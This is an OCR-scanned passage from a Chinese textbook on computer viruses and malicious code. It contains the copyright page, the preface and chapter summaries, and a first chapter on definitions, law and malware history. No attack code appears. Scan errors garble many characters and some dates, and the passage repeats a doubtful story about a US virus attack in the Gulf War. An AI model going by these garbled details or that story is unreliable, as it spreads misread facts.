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内 容 简 介 


本 书 详细 介绍 恶意 代码 ( 含 传统 计算 机 病毒 ) 的 基本 原理 和 主要 防治 技术 ,深入 分 析 和 探讨 恶意 代码 
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含义 .恶意 代码 的 理论 模型 .恶意 代码 的 结构 和 技术 特征 分 析 、 特 洛 伊 木马 ,勒索 软件 .Linux 系统 下 的 恶意 
代码 .蠕虫 .移动 终端 恶意 代码 、 恶 意 代码 的 查 杀 方法 和 防治 技术 ,以 及 常用 杀毒 软件 及 其 解决 方案 和 恶意 
代码 的 防治 策略 等 。 

本 书 通俗 易 懂 ,注重 理论 与 实践 相 结合 ,所 设计 的 教学 实验 覆盖 了 所 有 类 型 的 恶意 代码 ,使 读者 能 够 
举一反三 。 为 了 便于 教学 ,本 书 附带 教学 课件 、 实 验 用 源 代 码 以 及 辅助 应 用 程序 版 本 说 明 等 内 容 ,下 载 地 
址 为 www. tupwk. com. cn/downpage, 下 载 并 解压 缩 后 ,就 可 按照 教材 设计 的 实验 步骤 使 用 。 

本 书 可 作为 高 等 院 校 信息 安全 专业 和 计算 机 相关 专业 的 教材 ,也 可 供 广 大 系统 管理 员 ,计算 机 安全 技 
术 人 员 参 考 。 


本 书 封面 贴 有 清华 大 学 出 版 社 防伪 标签 ,无 标签 者 不 得 销售 。 
版 权 所 有 ,侵权 必 究 。 侵 权 举 报 电 话 : 010-62782989 13701121933 


图 书 在 版 编目 (CIP) 数 据 


计算 机 病毒 与 恶意 代码 : 原理 ,技术 及 防范 / 刘 功 申 等 编著 .一 4 版 . 一 北京 : 清华 大 学 出 版 社 ,2019 
(21 世纪 高 等 学 校 网 络 空 间 安 全 专业 规划 教材 ) 
ISBN 978-7-302-51658-3 


I. @ 计 … 工 . @ 刘 … ” 焉 . @ 计 算 机 病毒 一 研究 NN. DTP309.5 


中 国 版 本 图 书馆 CIP 数据 核 字 (2018) 第 257482 号 


策划 编辑 : 魏 江 江 
责任 编辑 : 王 冰 飞 
封面 设计 : 刘 键 
责任 校对 : 焦 丽 丽 
责任 印 制 : 沈 露 


出 版 发 行 : 清华 大 学 出 版 社 
网 址 : http://www. tup. com. cn, http://www. wqbook. com 
地 址 : 北京 清华 大 学 学 研 大 厦 A 座 邮 编 : 100084 
社 总 机 : 010-62770175 邮  ” 购 : 010-62786544 
投稿 与 读者 服务 : 010-62776969 ，c-service@tup. tsinghua. edu. cn 
质量 反馈 : 010-62772015 ，zhiliang@tup. tsinghua. edu. cn 
课件 下 载 : http://www. tup. com. cn,010-62795954 

: 清华 大 学 印刷 厂 

全 国 新 华 书店 

: 185mmX 260mm 印 张 : 22.25 

: 2008 年 2 月 第 1 版 2019 年 6 月 第 4 版 

: 1~1500 

: 59.50 元 


漆 


窟 光学 证 素 吉 


: 543 千 字 
: 2019 年 6 月 第 1 次 印刷 


症 妇 二 六 腔 导 
加 省 


L 
到 


编号 : 080122-01 


却 [a 


由 于 传统 的 计算 机 病毒 是 一 个 非常 狭义 的 定义 , 它 仅仅 概括 了 感染 文件 (可 执行 文件 及 数 
据 文 件 ) 和 引导 区 的 恶意 代码 ,无 法 描述 各 种 新 兴 恶 意 代码 的 特征 和 内 涵 。 鉴 于 此 ,本 
书 采用 “恶意 代码 ”这 个 概念 来 概括 书 中 内 容 。 

恶意 代码 作为 信息 安全 领域 的 重要 一 环 , 近 年 来 在 组 织 对抗 、 国 家 博弈 、 社 会 稳定 
方面 发 挥 了 双 刃 剑 的 作用 ,引起 了 社会 各 界 的 广泛 重视 。 

本 书 的 主要 内 容 来 源 于 作者 在 计算 机 病毒 和 恶意 代码 领域 的 12 年 教学 经 验 、8 年 
恶意 代码 及 其 防范 研究 基础 以 及 前 期 编写 的 4 种 教材 。 本 书 的 前 身 ( 计 算 机 病毒 及 其 
防范 技术 兴 计 算 机 病毒 及 其 防范 技术 (第 2 版 ) 兴 恶意 代码 防范 》 和 《恶意 代码 与 计算 
机 病毒 一 一 原理 ,技术 和 实践 ) 被 多 所 高 校 作为 教材 ,得 到 了 大 家 的 支持 和 认可 。 同 
时 ,这 些 教材 也 分 别 获得 了 “上 海 交 通 大 学 优秀 教材 特等 奖 ”“ 上 海 市 高 等 教育 教材 
一 等 奖 ”。 

书 中 重点 分 析 恶 意 代 码 的 运行 机 制 ,并 通过 实验 的 方式 讲解 常见 恶意 代码 。 在 分 
析 恶 意 代码 技术 的 基础 上 ,重点 分 析 恶 意 代码 的 检测 和 清除 技术 。 此 外 ,还 对 预防 恶意 
代码 的 策略 和 防治 方案 进行 了 探讨 。 全 书 共 分 12 章 , 具 体内 容 如 下 。 

第 1 章 : 恶意 代码 概述 。 本 章 主要 介绍 恶意 代码 的 基本 概念 ,并 在 此 基础 上 讲述 
恶意 代码 的 关键 历史 转折 点 ,技术 分 类 传播 途径 、 感 染 症 状 、 命 名 规则 及 未 来 发 展 趋势 
等 相关 问题 。 

第 2 章 : 恶意 代码 模型 及 机 制 。 本 章 主 要 介绍 恶意 代码 的 理论 模型 ,如 基于 图 灵 
机 的 传统 计算 机 病毒 模型 .基于 递归 函数 的 计算 机 病毒 的 数学 模型 .恶意 代码 预防 理论 
模型 .传统 计算 机 病毒 的 结构 及 工作 机 制 等 。 

第 3 章 : 传统 计算 机 病毒 。 本 章 主要 介绍 在 DOS、Windows 9x、Windows 2000 平 
台 下 传统 病毒 的 工作 机 制 和 编制 技术 ,并 以 3 种 平台 下 的 可 执行 文件 结构 为 线索 ,在 分 
析 这 些 文件 结构 的 基础 上 ,引入 不 同 平台 的 病毒 编制 技术 。 为 了 保证 教材 的 系统 性 ,本 
章 还 简要 介绍 引导 型 病毒 和 宏 病 毒 。 

第 4 章 : Linux 恶意 代码 技术 。 本 章 在 了 解 Linux 安全 问题 的 基础 上 ,探讨 Linux 
恶意 代码 的 概念 ,分 析 Linux 可 执行 文件 格式 (ELF) 的 运行 机 制 。 

第 5 章 : 特洛伊 木马 。 为 了 使 读者 充分 了 解 特洛伊 木马 ,本 章 详细 分 析 木 马 的 技 
术 特 征 、 木 马 人 侵 的 一 些 常 用 技术 以 及 木马 入 侵 的 防范 和 清除 方法 。 此 外 ,还 对 几 款 常 
见 木 马 程序 的 防范 经 验 做 了 较为 详细 的 说 明 。 
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第 6 章 : 移动 智能 终端 恶意 代码 。 本 章 以 手机 恶意 代码 为 主线 ,介绍 移动 终端 恶意 代 
码 的 概念 ,技术 进展 和 防范 工具 ,使 读者 了 解 未 来 移动 终端 设备 上 的 威胁 。 特 别 是 详细 介绍 
Android 下 开发 恶意 行为 程序 的 技术 。 

第 7 章 : 蠕虫 。 本 章 主要 介绍 近年 来 破坏 力 非常 大 的 蠕虫 (Worm) 的 基本 特征 、 技 术 特 
征 和 工作 机 制 , 并 且 详 细 介绍 基于 RPC 漏洞 和 U 盘 传 播 的 蠕虫 技术 。 

第 8 章 : 勒索 型 恶意 代码 。2013 年 兴起 的 勒索 型 恶意 代码 是 恶意 代码 领域 的 最 新 家 
族 。 本 章 主要 介绍 勒索 型 恶意 代码 的 概念 .原理 .危害 及 防范 技术 。 以 最 流行 的 WannaCry 
为 例 ,讲解 勒索 型 恶意 代码 的 结构 及 源 代 码 。 同 时 ,本 章 还 以 Hidden-Tear 为 例 , 设 计 了 一 
个 实验 。 

第 9 章 : 其 他 恶意 代码 。 本 章 对 近年 来 新 兴 的 流氓 软件 .Outlook 漏洞 恶意 代码 、 
WebPage 恶意 代码 、 僵 尸 网 络 `Rootkit 恶意 代码 和 APT( 高 级 持续 威胁 ) 做 了 介绍 ,并 对 其 
中 典型 恶意 代码 的 编制 技术 做 了 详细 讲解 。 

第 10 章 : 恶意 代码 防范 技术 。 本 章 以 检测 、 清 除 、 预 防 、 防 治 \、 数 据 和 策略 6 个 层次 为 
主要 思路 ,介绍 恶意 代码 的 诊断 原理 和 方法 、 清 除 原理 和 方法 、 主 动 和 被 动 防治 技术 以 及 数 
据 备 份 和 数据 恢复 等 。 

第 11 章 : 常用 杀毒 软件 及 其 解决 方案 。 本 章 通 过 介绍 企业 网 络 的 典型 结构 、 典 型 应 用 
和 网 络 时 代 的 病毒 特征 ,得 出 企业 网 络 防 范 恶 意 代 码 体系 对 技术 和 工具 的 需求 ,从 而 给 出 一 
些 典型 恶意 代码 防治 体系 解决 方案 。 

第 12 章 : 恶意 代码 防治 策略 。 本 章 通过 讨论 防御 性 策略 得 到 的 不 同 建议 来 避免 计算 
机 受到 恶意 代码 的 影响 。 本 章 侧重 于 全 局 策略 和 规章 ,并 且 针对 企业 用 户 所 讲述 的 内 容 比 
针对 单机 用 户 的 要 多 一 些 。 本 章 还 就 如 何 制订 一 个 防御 计划 ,如 何 挑选 一 个 快速 反应 小 组 ， 
如 何 控制 住 恶 意 代码 的 发 作 , 以 及 安全 工具 的 选择 等 问题 提出 了 一 些 建 议 。 

在 本 书 完稿 之 际 ,作者 对 上 海 交通 大 学 教材 出 版 基金 的 资助 表示 衷心 感谢 ; 感谢 教学 
12 年 来 听 过 作者 计算 机 病毒 原理 和 恶意 代码 防范 课程 的 所 有 学 生 ,他 们 为 作者 的 讲义 提出 
了 很 多 宝贵 意见 ; 感谢 各 类 参考 资料 的 提供 者 ,这些 资料 既 充 实 了 作者 的 教材 ,也 丰富 了 作 
者 的 知识 ; 感谢 清华 大 学 出 版 社 的 各 位 编辑 ,他 们 耐心 地 加 工 我 的 书稿 。 

为 便于 教学 ,本 书 提供 教学 课件 和 实验 源 代码 ,可 通过 清华 大 学 出 版 社 的 官方 网 站 
(www. tup. com. cn) 下 载 。 

由 于 作者 水 平 有 限 , 书 中 难免 有 政 漏 之 处 , 奶 请 读者 批评 指正 ,以 使 本 书 得 以 进一步 改进 
和 完善 。 
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第 1 章 ”恶意 代码 概述 


随 着 信息 技术 、 互 联网 技术 ,特别 是 信息 安全 技术 的 发 展 ,计算 机 病毒 的 概念 越 来 越 不 
能 全 面 反 映 其 内 涵 了 ,恶意 代码 的 概念 被 适时 地 提出 ,并 逐渐 为 人 们 接受 和 使 用 。 随 着 恶意 
代码 技术 的 发 展 ,恶意 代码 的 数量 也 在 迅速 增加 。2016 年 ,腾讯 电脑 管家 反 病 毒 实验 室 新 
发 现 病毒 1. 48 亿 个 ; 360 互联 网 安全 中 心 共 截获 PC 端 新 增 恶 意 程序 样本 1. 9 亿 个 ; 赛 门 
铁 克 共 发 现 3. 57 亿 个 恶意 软件 新 变种 。 据 国家 计算 机 网 络 应 急 技 术 处 理 协调 中 心 
(CNCERT/CC) 统 计 ,2016 年 CNCERT/CC 通过 自主 捕获 和 厂商 交换 获得 的 移动 互联 网 
恶意 程序 数量 205 万 余 个 ,2017 年 为 253 万 余 个 ,近年 持续 保持 高 速 增长 趋势 。 此 外 ,监测 
发 现 ,目前 活跃 在 智能 联网 设备 上 的 恶意 程序 家 族 也 超过 12 种 。 究 竟 有 多 少 恶意 代 码 存在 
于 世 , 这 是 个 不 可 解 的 问题 。 

为 什么 会 提出 恶意 代码 的 概念 ? 恶意 代码 和 计算 机 病毒 究竟 有 怎样 的 关系 ?恶意 代码 
究竟 包含 哪些 内 容 ? 恶意 代码 是 怎样 一 步 一 步 从 无 到 有 发 展 壮 大 的 ? 请 读者 带 着 这 些 问 题 
来 阅读 本 章 内 容 。 

本 章 主要 介绍 恶意 代码 的 基本 概念 ,并 在 此 基础 上 介绍 恶意 代码 的 发 展 历史 、 分 类 、 传 
播 途径 .感染 症状 、 命 名 规则 及 未 来 发 展 趋势 等 相关 问题 。 

本 章 学 习 目标 

(1) 明确 恶意 代码 的 基本 概念 。 

(2) 了 解 恶 意 代码 的 发 展 历史 。 

(3) 熟悉 恶意 代码 的 分 类 。 

(4) 熟悉 恶意 代码 的 命名 规则 。 

(5) 了 解 恶 意 代 码 未 来 的 发 展 趋势 。 


1.1 为 什么 提出 恶意 代码 的 概念 


国务 院 颁布 的 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》, 以 及 公安 部 出 台 的 《 计 
算 机 病毒 防治 管理 办 法 ) 将 计算 机 病毒 均 定义 为 : 计算 机 病毒 是 指 编制 或 者 在 计算 机 程序 
中 捅 入 的 破坏 计算 机 功能 或 者 毁坏 数据 ,影响 计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 
指令 或 者 程序 代码 。 

我 国 刑法 规定 ,故意 制作 、 传 播 计算 机 病毒 等 破坏 性 程序 ,影响 计算 机 系统 正常 运行 ,后 
果 严 重 的 ,依照 破坏 计算 机 信息 系统 罪 定罪 处 罚 。 而 在 互联 网 中 流行 的 蠕虫 .木马 是 否 属 于 
刑法 上 的 计算 机 病毒 等 破坏 性 程序 ,目前 还 没有 立法 或 者 司法 解释 。 根 据 上 述 有 关 计 算 机 
病毒 的 定义 ,感染 文件 的 普通 病毒 属于 计算 机 病毒 ,但 是 蠕虫 (部 分 )\ 木 马 ( 绝 大 部 分 ) 并 不 
进行 自我 复制 ,因此 不 符合 病毒 的 特征 ,不 属于 计算 机 病毒 ,而 它 的 危害 性 却 是 巨大 的 ,因为 
它 包 含 能 够 在 触发 时 导致 数据 丢失 甚至 被 窃取 的 恶意 代码 。 
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有 关 专 家 认为 ,如 果 根 据 相关 部 门 发 布 的 条 例 来 理解 ,将 蠕虫 和 木马 解释 为 计算 机 病毒 
是 不 符合 刑法 定罪 原则 的 ,而 蠕虫 和 木马 是 否 属于 “计算 机 病毒 等 破坏 性 程序 ”, 我 国法 律 没 
有 对 此 作出 解释 。 蠕 虫 和 木马 的 大 量 出 现 对 刑法 的 部 分 规定 提出 了 挑战 ,对 刑法 规定 的 破 
坏 性 程序 必须 作出 明确 的 界定 。 由 此 可 见 , 网 络 恶意 代码 技术 的 发 展 , 导 致 刑法 在 这 方面 的 
规定 显现 滞后 。 因 此 ,必须 通过 立法 将 木马 ,蠕虫 等 恶意 代码 纳入 破坏 性 程序 范围 。 

在 美国 ,有 些 州 (如 加 利 福 尼 亚 、 西 弗吉尼亚 等 ) 的 地 方法 规 中 ,把 恶意 代码 解释 成 计算 
机 系统 的 污染 物 。 显 然 , 它 们 的 法 律 适用 面 更 加 宽泛 。 

在 信息 安全 技术 领域 ,重新 审视 目前 流行 的 破坏 性 程序 ,有 很 多 已 经 不 能 用 “计算 机 病 
毒 " 这 个 概念 来 解释 了 。 以 下 从 两 个 方面 进一步 说 明 : 就 恶意 代码 的 类 型 而 言 ,这 些 破坏 性 
程序 除了 木马 之 外 ,还 有 网 络 僵尸 .流氓 软件 .逻辑 炸弹 、 网 络 钓鱼 .恶意 脚本 等 。 就 感染 平 
台 而 言 , 传 统 的 计算 机 病毒 的 定义 仅仅 局 限于 计算 机 平台 ,而 智能 手机 恶意 代码 则 运行 于 手 
机 平台 。 关 于 手机 上 的 恶意 代码 就 不 能 简单 地 归 类 于 传统 的 计算 机 病毒 概念 了 。 

在 法 律 领域 ,专家 们 努力 的 方向 是 扩大 法 律 解释 范围 ,把 新 型 的 破坏 性 程序 及 时 补充 到 
法 律 条 文中 。 在 技术 领域 ,专家 们 的 责任 更 是 责无旁贷 ,因此 ,需要 一 个 新 的 概念 来 概括 这 
些 破 坏 性 程序 。 这 个 新 的 概念 就 是 “恶意 代码 ”。 


1.2 恶意 代码 的 概念 


Ed Skoudis 和 Lenny Zeltser 在 Malware: Fighting Malicious Code 中 给 出 的 恶意 代 
码 定义 为 : 运行 在 目标 计算 机 上 ,使 系统 按照 攻击 者 意愿 执行 任务 的 一 组 指令 。 

在 维基 百科 中 ,恶意 代码 的 英文 对 照 词 是 Malware, 也 就 是 Malicious Software 的 混成 
词 。 恶 意 代 码 的 定义 描述 为 : 恶意 代码 是 在 未 被 授权 的 情况 下 ,以 破坏 软 硬 件 设备 、 窃 取 用 
户 信息 、 扰 乱用 户 心理 .干扰 用 户 正常 使 用 为 目的 而 编制 的 软件 或 代码 片段 。 这 个 定义 涵盖 
的 范围 非常 广泛 , 它 包 含 了 所 有 敌意 插入、 干扰 .讨厌 的 程序 和 源 代码 。 一 个 软件 被 看 作 是 
恶意 代码 主要 是 依据 创作 者 的 意图 ,而 不 是 恶意 代码 本 身 的 特征 。 

依据 这 个 定义 ,恶意 代码 将 包括 计算 机 病毒 (Computer Virus) .蠕虫 (Worm) 、 特 洛 伊 
木马 (Trojan Horses) 、Rootkit、 间 谍 软 件 (Spyware) 、 恶 意 广告 (Dishonest Adware) ,流氓 软 
件 (Crimeware) .逻辑 炸弹 (Logic Boom)、 后 门 (Back Door) 僵尸 网 络 (Botnet)、 网 络 钓鱼 
(Phishing) 、 恶 意 脚 本 (Malice Script) 垃圾 信息 (Spam)、 智 能 终端 恶意 代码 (Malware in 
Intelligent Terminal Device) 等 恶意 的 或 讨厌 的 软件 及 代码 片段 。 国 际 上 目前 新 出 现 了 一 
种 以 “扰乱 用 户 心理 ?为 目的 的 软件 ,也 应 该 属于 恶意 代码 的 范畴 。 由 于 这 类 软件 的 使 用 范 
围 非 常 小 ,因此 不 为 人 们 所 熟知 。 在 这 个 定义 范围 内 ,恶意 代码 不 是 有 缺陷 的 软件 ,也 就 是 
说 ,包含 有 害 漏洞 但 其 目的 合法 的 软件 不 是 恶意 代码 。 例 如 ,微软 的 Windows 操作 系统 , 尽 
管 也 包含 很 多 有 害 漏洞 .但 因为 其 目的 是 合法 的 ,因此 ,Windows 不 是 恶意 代码 。 

恶意 代码 是 一 个 具有 特殊 功能 的 程序 或 代码 片段 ,就 像 生物 病毒 一 样 ,恶意 代码 具有 独 
特 的 传播 和 破坏 能 力 。 亚 意 代码 可 以 很 快 地 蔓延 ,又 常常 难以 根除 。 它 们 能 把 自身 附着 在 
各 种 类 型 的 对 象 上 , 当 寄 生 了 恶意 代码 的 对 象 从 一 个 用 户 到 达 另 一 个 用 户 时 ,它们 就 随同 该 
对 象 一 起 草 延 开 来 。 除 传播 和 复制 能 力 外 . 某 些 恶意 代码 还 有 其 他 一 些 特殊 性 能 ,例如 , 特 
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洛 伊 木 马 具有 和 窃取 信息 的 特性 , 流 谍 软 件 具 有 干扰 用 户 的 特性 ,而 蠕 忠 则 主要 具有 利用 漏洞 
传播 来 占用 带宽 ,耗费 资源 等 特性 。 

迄今 为 止 ,各 种 恶意 代码 表现 出 不 同 的 特征 ,但 总 结 起 来 ,恶意 代码 具有 以 下 3 个 明显 
的 共同 特征 。 

1. 目的 性 

目的 性 是 恶意 代码 的 基本 特征 ,是 判别 一 个 程序 或 代码 片段 是 否 为 恶意 代码 的 最 重要 
的 特征 ,也 是 法 律 上 判断 恶意 代码 的 标准 。 

2. 传播 性 

传播 性 是 恶意 代码 体现 其 生命 力 的 重要 手段 。 恶 意 代 码 总 是 通过 各 种 手段 把 自己 传播 
出 去 ,到 达 尽 可 能 多 的 软 硬 件 环 境 。 

3. 破坏 性 

破坏 性 是 恶意 代码 的 表现 手段 。 任 何 恶 意 代码 传播 到 了 新 的 软 硬 件 系统 后 ,都 会 对 系 
统 产生 不 同 程度 的 影响 。 它 们 发 作 时 轻 则 占用 系统 资源 ,影响 系统 运行 速度 ,降低 系统 工作 
效率 ,使 用 户 不 能 正常 使 用 系统 , 重 则 破坏 用 户 系统 数据 ,甚至 破坏 系统 硬件 ,给 用 户 带 来 巨 
大 的 损失 。 


1.3 恶意 代码 的 发 展 历史 


恶意 代码 的 产生 原因 多 种 多 样 , 有 的 是 计算 机 工作 人 员 或 业余 爱好 者 纯粹 为 了 寻 开 心 
而 制造 出 来 的 ,有 的 则 是 软件 公司 为 防止 自己 的 产品 被 非法 复制 而 制造 的 ,这 些 情况 助长 了 
恶意 代码 的 制作 和 传播 。 还 有 一 种 情况 就 是 蓄意 破坏 , 它 分 为 个 人 行为 和 政府 行为 两 种 。 
个 人 行为 多 为 雇员 对 雇主 的 报复 行为 ,而 政府 行为 则 是 有 组 织 的 战略 战术 手段 。 在 “海湾 战 
争 " 中 ,美国 国防 部 的 某 个 机 构 曾 对 伊拉克 的 通信 系统 进行 了 有 计划 的 恶意 代码 攻击 ,一度 
使 伊拉克 的 国防 通信 系统 陷于 竣 疯 。 另 外 还 有 些 恶意 代码 是 用 于 研究 或 实验 而 设计 的 “有 
用 ”程序 ,由 于 某 种 原因 失去 控制 而 扩散 出 去 ,成 为 危害 四 方 的 恶意 代码 。 但 是 ,无 论 基于 什 
么 目的 而 产生 的 恶意 代码 ,都 给 用 户 带 来 了 非常 大 的 危害 。 

2008 年 12 月 5 日 ,在 卡巴 斯 基 实 验 室 举办 的 病毒 分 析 师 峰会 上 ,卡巴 斯 基 实 验 室 的 高 
级 区 域 研究 师 David Emm 发 表 了 关于 恶意 代码 市 场 分 析 的 主题 演讲 。David 在 主题 演讲 
中 指出 ,恶意 代码 的 数量 每 秒 钟 都 在 增长 ,到 2008 年 年 底 为 止 ,全 球 大 约 存在 恶意 代码 140 
万 种 。2017 年 腾讯 电脑 管家 统计 数据 显示 ,PC 端 总 计 已 拦截 恶意 代码 近 30 亿 次 ,截获 
Android 新 增 恶 意 代 码 总 数 达 1545 万 种 。 

本 节 以 恶意 代码 发 展 过 程 中 的 关键 环节 为 主线 ,回顾 恶意 代码 从 出 现 到 莲 勃 发 展 的 历 
史 过 程 中 的 一 些 关 键 环节 。 


1.3.1 概念 阶段 


自从 1946 年 第 一 台电 子 积分 数字 计算 机 ENIAC 问世 以 来 ,计算 机 与 人 们 的 生活 已 经 
越 来 越 息 息 相 关 了 .人 们 甚至 已 经 无 法 在 没有 计算 机 的 世界 里 生活 了 。 但 是 人 们 发 现 就 如 
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同人 会 生病 一 样 ,计算 机 的 世界 里 也 存在 病毒 ,计算 机 也 会 感染 病毒 。 那 么 ,恶意 代码 是 如 
何 一 步 一 步 地 从 无 到 有 、 从 小 到 大 发 展 到 今天 的 呢 ? 接 下 来 的 介绍 可 以 解答 这 一 问题 。 

其 实 , 恶 意 代 码 的 初始 阶段 都 集中 体现 为 计算 机 病毒 这 一 典型 的 恶意 代码 。 在 第 一 台 
商用 计算 机 出 现 之 前 ,1949 年 伟大 的 计算 机 技术 先驱 一 一 汉 。 诺 依 曼 (John von Neumann) 
在 他 的 一 篇 论文 (复杂 自动 装置 的 理论 及 组 织 的 进行 ) 中 ,就 已 经 勾勒 出 了 病毒 的 蓝图 ,认为 
存在 着 能 进行 自我 繁殖 的 计算 机 程序 ,当时 绝 大 部 分 的 计算 机 专家 都 无 法 想象 。 

计算 机 病毒 这 个 词语 最 早 是 出 现在 科幻 小 说 中 的 。1977 年 夏天 ,托马斯 瑞安 
(Thomas J. Ryan) 的 科幻 小 说 (P-1 的 春天 》(The Adolescence of P-1) 成 为 美国 的 畅销 书 。 
作者 在 这 本 书 中 描写 了 一 种 可 以 在 计算 机 中 互相 传染 的 病毒 ,病毒 最 后 控制 了 7000 台 计 算 
机 ,造成 了 一 场 灾难 。 不 过 ,这 在 当时 并 没有 引起 人 们 的 注意 。 


1.3.2 滕 有 阶 段 


磁 世 大战 (Core War 或 Core Wars) 是 在 汉 “。 诺 依 曼 病毒 程序 蓝图 的 基础 上 提出 的 概 
念 。20 世纪 60 年 代 在 美国 电话 电报 公司 (AT&T) 的 贝尔 (Be 实验 室 工作 的 3 个 年 轻 程序 
员 道 格拉 斯 . 麦 基 尔 罗 伊 (H. Douglas Mcllroy) 、 维 克 多 。 维 索 特 斯 克 (Victor Vysottsky) 以 及 
罗伯特 ， 莫 里 斯 (Robert T， Morris) 创 造 了 该 电子 游戏 ,实现 程序 的 自我 繁殖 。 

磁 芯 大 战 的 玩法 为 : 双方 各 写 一 套 程序 并 输入 同一 部 计算 机 中 ,这 两 套 程序 在 计算 机 
系统 内 互相 追 杀 ,有 了 时 它们 会 放置 一 些 关卡 甚至 有 时 会 停 下 来 修复 被 对 方 破坏 的 几 行 指令 。 
当 被 困 时 ,它们 可 以 把 自己 复制 一 次 从 而 逃离 险 境 , 因 为 它们 都 在 计算 机 的 记忆 磁 世 中游 
走 , 因 此 得 名 磁 芯 大 战 。 这 个 游戏 的 特点 在 于 双方 的 程序 进入 计算 机 之 后 , 玩 游戏 的 人 只 能 
看 着 屏幕 上 显示 的 战况 ,而 不 能 做 任何 更 改 ,直到 某 一 方 的 程序 被 男 一 方 的 程序 完全 “ 吃 掉 ” 
为 止 。 


1.3.3 第 一 款 真实 恶意 代码 


1983 年 11 月 3 日 , 弗 雷 德 . 科恩 (Fred Cohen) 博 士 研制 出 一 种 在 运行 过 程 中 可 以 复 
制 自身 的 破坏 性 程序 。 伦 ， 艾 德 勒 曼 (Len Adleman) 将 这 种 破坏 性 程序 命名 为 计算 机 病毒 
(Computer Viruses) ,并 在 每 周一 次 的 计算 机 安全 讨论 会 上 正式 提出 ,8 小 时 后 专家 们 在 
VAX 117/50 计算 机 系统 上 成 功 运 行 该 程序 。 就 这 样 ,第 一 个 恶意 代码 实验 成 功 。 这 是 人 
们 第 一 次 真正 意识 到 计算 机 病毒 的 存在 。 


1.3.4 PC 病毒 


1986 年 年 初 ,巴基斯坦 的 巴 斯 特 (Basit) 和 阿 姆 杰 德 (Amjad) 两 兄弟 编写 了 Pakistan 病 
毒 , 即 Brain。Brain 是 第 一 个 感染 PC 的 恶意 代码 。 随 着 PC 的 莲 勃 发 展 , 恶 意 代码 迅速 发 
展 壮大 起 来 。 

1987 年 世界 各 地 的 计算 机 用 户 几 乎 同时 发 现 了 形形色色 的 计算 机 病毒 ,如 大 麻 、IBM 
圣诞 树 ,黑色 星期 五 等 。 面 对 计算 机 病毒 的 突然 袭击 ,众多 计算 机 用 户 甚 至 专业 人 员 都 惊慌 
失措 。 

1988 年 3 月 2 日 ,一 种 苹果 电脑 的 恶意 代码 发 作 。 这 天 受 感 染 的 苹果 电脑 停止 工作 ， 
只 显示 “向 所 有 苹果 电脑 的 使 用 者 宣布 和 平 的 信息 ”, 以 庆祝 苹果 电脑 生日 。 这 是 第 一 个 感 
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染 窗 口 系统 的 恶意 代码 。 

989 年 全 世界 的 计算 机 病毒 攻击 十 分 猩 铬 ,我 国 也 未 能 幸免 。 其 中 * 米 开朗 基 罗 ”病毒 
给 许多 计算 机 用 户 造成 了 极 大 的 损失 。 这 个 病毒 比较 著名 的 原因 ,除了 它 拥有 一 代 艺 术 大 
师 米 开朗 基 罗 的 名 字 之 外 ,更 重要 的 是 它 的 破坏 力 非常 强大 。 


1.3.5 蠕虫 插曲 


1988 年 冬天 ,正在 美国 康 奈 尔 大 学 攻读 的 莫 里 斯 ,把 一 个 被 称 为 “蠕虫 ”的 计算 机 病毒 
送 进 了 美国 最 大 的 计算 机 网 络 一 一 互联 网 。1988 年 11 月 2 日 下 午 5 点 ,互联 网 的 管理 人 
员 首 次 发 现 网 络 有 不 明和 人 侵 者 。 当 晚 ,从 美国 东海 岸 到 西海 岸 , 互 联网 用 户 陷入 一 片 恐 慌 。 
由 于 当时 的 网 络 非常 有 限 , 其 破坏 力 没 有 得 到 充分 发 挥 。 其 实 , 蠕 虫 的 概念 起 源 更 早 , 在 
1982 年 ,Shock 和 Hupp 根据 The Shockwave Rider 一 书 中 的 概念 提出 了 一 种 “蠕虫 ” 
(Worm) 程 序 的 思想 。 蠕 虫 的 真正 爆发 却 在 十 多 年 后 ,20 世纪 初 ,蠕虫 在 互联 网 中 大 爆发 ， 
其 原理 正 是 来 自 莫 里 斯 的 蠕虫 。 


1.3.6 走向 战争 


1991 年 在 “海湾 战争 "中 ,美军 第 一 次 将 计算 机 病毒 用 于 实战 ,在 空袭 巴格达 的 战斗 前 ， 
成 功 地 破坏 了 对 方 的 指挥 系统 ,使 之 瘫 痰 ,保证 了 战斗 的 顺利 进行 ,直至 最 后 胜利 。 


1.3.7 对 抗 杀毒 软件 


1992 年 出 现 了 针对 杀毒 软件 的 “幽灵 ”病毒 ,如 One-Half。 该 病毒 直接 挑战 简单 的 特征 
码 扫描 技术 ,随后 各 个 安全 厂商 推出 了 启发 式 扫描 \ 含 有 通配符 的 特征 码 等 技术 来 应 对 幽灵 
型 病毒 。 


1.3.8 写 病 毒 不 再 困难 


1996 年 首次 出 现 针对 微软 公司 Office 的 “ 宏 病毒 ”。 安 病毒 的 出 现 使 病毒 编制 工作 不 
青 局 限于 星 涩 难 懂 的 汇编 语言 。 由 于 书写 简单 , 越 来 越 多 的 恶意 代码 出 现 了 。1997 年 被 公 
认为 信息 安全 界 的 “ 宏 病 毒 年 "。 宏 病毒 主要 感染 Word、Excel 等 文件 。 例 如 Word 宏 病 
毒 ,早期 是 用 一 种 专门 的 BASIC 语言 , 即 Word Basic 所 编写 的 程序 ,后 来 使 用 Visual 
Basic。 与 其 他 计算 机 病毒 一 样 , 它 能 对 用 户 系统 中 的 可 执行 文件 和 数据 文本 类 文件 造成 破 
坏 。 常 见 的 宏 病 毒 有 Taiwan NO.1( 台 湾 一 号 )、Setmd、Consept、Mdma 等 。 


1.3.9 破坏 硬件 的 病毒 


1998 年 出 现 针对 Windows 95/ Windows 98 系统 的 CIH 病毒 (1999 年 被 公认 为 计算 机 
反 病 毒 界 的 CIH 病毒 年 )。CIH 病毒 是 继 DOS 病毒 .Windows 病毒 、 宏 病毒 后 的 第 四 类 新 
型 病毒 。 这 种 病毒 与 DOS 下 的 传统 病毒 有 很 大 区 别 , 它 是 使 用 面向 Windows 的 VXD 技术 
来 编制 的 。1998 年 8 月 从 台湾 传人 大 陆 的 CIH 病毒 ,其 发 展 过 程 经 历 了 v1. 0、vl. 1、v1. 2、 
vl.3\v1.4 总 共 5 个 版 本 。 该 病毒 是 第 一 个 直接 攻击 、 破 坏 硬 件 的 计算 机 病毒 ,是 破坏 最 为 
严重 的 病毒 之 一 。 它 主要 感染 Windows 95/Windows 98 的 可 执行 程序 ,发作 时 破坏 计算 机 
Flash BIOS 芯片 中 的 系统 程序 ,导致 主板 损坏 ,同时 破坏 硬盘 中 的 数据 。 病 毒 发 作 时 ,硬盘 
